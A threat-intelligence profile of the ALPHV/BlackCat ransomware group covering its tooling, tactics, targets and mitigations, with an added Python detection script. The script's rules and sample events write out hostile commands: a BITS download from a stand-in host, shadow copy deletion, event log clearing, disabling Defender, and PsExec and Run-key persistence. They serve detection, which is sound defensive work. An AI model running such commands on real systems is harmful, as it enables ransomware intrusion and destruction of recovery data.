Threat Actor Profile: ALPHV Ransomware Group

Chris Lucas
May 22, 2023


ALPHV is a financially motivated actor that emerged in late 2021. It operates under a Ransomware-as-a-Service (RaaS) model, primarily for its novel BlackCat ransomware, and belongs to a family of Russia-based ransomware syndicates. For attribution purposes this actor is also tracked under other names, including UNC4466, BlackCat and Noberus. RaaS is a model of criminal extortion in which a ransomware author markets access to their malware payload to affiliate actors. These affiliates commonly carry out tasks such as target selection and exploitation, with the author setting certain rules such as the ransom amount and even limits on the types of targets. The malware author sets the percentage of the collected ransom that goes to the affiliates, with ALPHV offering a generous cut of up to 90%. ALPHV uses a combination of publicly available and novel tools across an attack chain that is tied together by a triple extortion tactic. The group has targeted entities in the manufacturing, medical, transportation and financial sectors across several countries, including the United States, Australia, Germany, Italy and the United Kingdom.

Known Techniques & Capabilities

ALPHV’s primary payload is the BlackCat ransomware, which is unusual for being developed in the Rust programming language. Because Rust compiles to native code for multiple platforms, BlackCat can be deployed in both Windows and Linux environments, across various Windows operating system versions and Linux distributions. The BlackCat ransomware comes with anti-analysis capabilities built on the Zeroize library, which wipes attributable artifacts from memory. ALPHV operations are often highly targeted, which is reflected in the custom configurations discovered in analyzed BlackCat payload samples. BlackCat ships with a variety of configuration options written in JSON, which ALPHV affiliates can customize in the post-reconnaissance phase. The ransomware can be configured to use several different encryption modes, including full file encryption as well as the SmartPattern and DotPattern options. These default configurations can be overridden to accommodate different circumstances in the target environment. The payload must also be run with a 32-bit access token. Special features of the Linux and Windows variants include:

· Support for VMware ESXi, for the purpose of stopping virtual machines and deleting VM snapshots.

· Privilege escalation by bypassing User Account Control (UAC), via Masquerade_PEB, and by exploiting the ‘CreateProcessWithLogonW’ API (tracked as CVE-2016-0099).

· Use of ‘fsutil’ to enable ‘remote to local’ and ‘remote to remote’ symbolic link evaluation.

· Acquisition of the host’s universally unique identifier (UUID) via the Windows Management Instrumentation Command-line (WMIC).

· Use of PsExec to execute the ransomware on a remote host for expanded propagation.

Analyst Comments:

The targeting of Linux environments is likely an additional technique aimed at virtual environments such as VMware ESXi, which are commonly used to store file system backups. Successfully targeting these environments can deny a victim the ability to recover files encrypted by BlackCat in their enterprise environment. This technique was also notably employed by the BlackMatter and Conti ransomware actors in 2021. Other features of the ransomware are more common among ransomware families, such as removing shadow copies and terminating specific processes like Microsoft Exchange and Office applications. If you’re maintaining recovery backups in a virtual environment, it’s strongly recommended to keep such environments isolated and disconnected from your production network.

As mentioned, ALPHV uses a triple extortion technique against its targets, which combines encryption and the exfiltration of sensitive information with the additional threat of distributed denial of service (DDoS) attacks if the demanded ransom is not paid. Exmatter is one tool used by ALPHV for the exfiltration of data. At the start of an operation, ALPHV affiliates conduct reconnaissance to profile the target, allowing them to better configure follow-on tools and BlackCat itself.

ALPHV affiliates commonly use phishing, open ports, known vulnerabilities and stolen credentials for initial access, which are common initial vectors among other ransomware groups as well. Stolen credentials become another component of ALPHV’s activity during the later privilege escalation and lateral movement stages. A recently observed ALPHV operation saw the exploitation of vulnerabilities in Veritas Backup Exec installations, including CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878. Additionally, the scanning tools Advanced IP Scanner by Famatech and ADRecon are downloaded into the victim’s environment. ADRecon is a tool that allows ALPHV to effectively map an Active Directory environment, if present, and returns the results to the attacker in a generated report.

Analyst Comments:

Organizations can take proactive steps to mitigate these attack vectors by closely monitoring traffic coming from Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services. Where the service is not needed, turning off RDP altogether is recommended. Likewise, having strong password and authentication policies in place is critical to preventing unauthorized access and limiting lateral movement. This includes complex passwords with regularly enforced changes, the implementation of multi-factor authentication, and securing certificate authorities. Limit the permissions of users and user groups to avoid the unauthorized creation of tokens. Patch management can minimize additional points of entry. Above all else, maintaining good behavioral detections can be effective against the Living-off-the-Land (LOTL) techniques commonly used by ransomware actors. ALPHV is also noted for conducting thorough information gathering, which allows it to build a clearer profile of a target organization and of the potential initial vectors it can exploit. Metasploit, a common tool for legitimate penetration testing, has been used by ALPHV as well as by other threat actors. Exploit kits could be further aiding ALPHV in more quickly identifying exploitable vulnerabilities.

On top of using already stolen credentials, ALPHV utilizes publicly available tools for scraping credentials within a target environment. Nanodump, Mimikatz and LaZagne allow the attacker to gather clear-text passwords. These tools are downloaded onto the target system using the Background Intelligent Transfer Service (BITS). The gathering of additional credentials allows ALPHV to manipulate and escalate account privileges as well as carry out lateral movement. RDP is also a common vector for moving laterally (T1021.001), along with PsExec, which lets ALPHV execute processes remotely. For persistence, ALPHV operators leverage legitimate Windows services (T1543.003), generate Registry run keys to execute their tools at system startup (T1547.001) and create system processes (T1543).

Beyond the obfuscation capabilities built into BlackCat, ALPHV operators also clear event logs (in Windows environments), conduct token manipulation and theft, and disable real-time monitoring tools, including Windows Defender.
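The host-level behaviours described above (fsutil symlink evaluation, UUID collection via WMIC, BITS downloads, shadow copy removal, event log clearing, Defender tampering, PsExec and Run key persistence) are all visible in process-creation telemetry. The following is an added example of simple command-line triage rules over constructed sample events; it is not code from the original post and the rule patterns and sample events are assumptions, not a vendor ruleset.

```python
import re

# Command-line patterns for behaviours the profile attributes to ALPHV/BlackCat (assumed rules).
RULES = [
    ("fsutil symlink evaluation (R2L/R2R)",
     re.compile(r"fsutil\s+behavior\s+set\s+symlinkevaluation\b.*\bR2[LR]:1", re.I)),
    ("host UUID collection via WMIC",
     re.compile(r"\bwmic\b.*\bcsproduct\b.*\buuid\b", re.I)),
    ("tool download via BITS",
     re.compile(r"(bitsadmin\b.*/transfer|Start-BitsTransfer\b)", re.I)),
    ("shadow copy removal",
     re.compile(r"\bvssadmin\b.*\bdelete\s+shadows\b", re.I)),
    ("event log clearing",
     re.compile(r"(wevtutil(\.exe)?\s+cl\b|Clear-EventLog\b)", re.I)),
    ("Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("remote execution via PsExec",
     re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("Run key persistence",
     re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
]

def match_event(command_line):
    """Return the labels of every rule the command line triggers."""
    return [label for label, rx in RULES if rx.search(command_line)]

def triage(events):
    """events: iterable of (host, user, command_line); returns (host, user, label) hits in input order."""
    hits = []
    for host, user, cmd in events:
        for label in match_event(cmd):
            hits.append((host, user, label))
    return hits

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    ("ws01", "CORP\\jdoe", "fsutil behavior set SymlinkEvaluation R2L:1 R2R:1"),
    ("ws01", "CORP\\jdoe", "wmic csproduct get UUID"),
    ("ws01", "CORP\\jdoe", "bitsadmin /transfer job1 http://example.invalid/n.exe C:\\Temp\\n.exe"),
    ("ws01", "CORP\\jdoe", "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("srv02", "NT AUTHORITY\\SYSTEM", "vssadmin delete shadows /all /quiet"),
    ("srv02", "NT AUTHORITY\\SYSTEM", "wevtutil.exe cl Security"),
    ("srv02", "CORP\\svc-backup", "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d C:\\Temp\\n.exe"),
    ("srv02", "CORP\\jdoe", "psexec.exe \\\\srv03 -s cmd /c C:\\Temp\\n.exe"),
    ("ws01", "CORP\\jdoe", "notepad.exe C:\\Users\\jdoe\\notes.txt"),
]

if __name__ == "__main__":
    for host, user, label in triage(SAMPLE_EVENTS):
        print(f"{host} {user}: {label}")
```

Several of these commands also have legitimate administrative uses, so in practice the hits are best correlated by host and user within a short window rather than alerted on individually.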

Targets

ALPHV shows little restraint in its targeting approach and has directed its activity against organizations across nearly all industry sectors. These have included transportation services, logistics, manufacturing, technology, energy, financial, medical and communications. This indiscriminate level of targeting could be a trait carried over from members of the former REvil and BlackMatter ransomware groups.

Closing Analysis

As of April 2023, ALPHV has developed into a highly prolific criminal group, second only to the LockBit ransomware group in observed activity. Being primarily based in the Russian Federation, ALPHV is unlikely to target organizations based in Russia and the surrounding region that makes up the Commonwealth of Independent States (CIS).

There is also some confidence that ALPHV may be made up of members from the now-defunct REvil, DarkSide and BlackMatter ransomware groups. In addition to that history, the current ALPHV group is believed to have links to other Russia-based cybercrime syndicates such as FIN7 and FIN12.

While ALPHV does not have the footprint of actors like LockBit, TA505 and TA542 (creators of Emotet), its rapid growth, innovation, operational patience and lack of restraint make it a high threat to organizations with services and interests across the globe. The novel characteristics of the BlackCat payload and its reach are compounded by a robust anti-analysis and anti-detection component in ALPHV campaigns. The use of a triple extortion tactic further heightens the current threat this group poses to many organizations. Finally, this actor represents years of learning from previous ransomware groups and likely includes very skilled individuals. It’s highly likely this actor will continue to grow its activity through the rest of 2023.
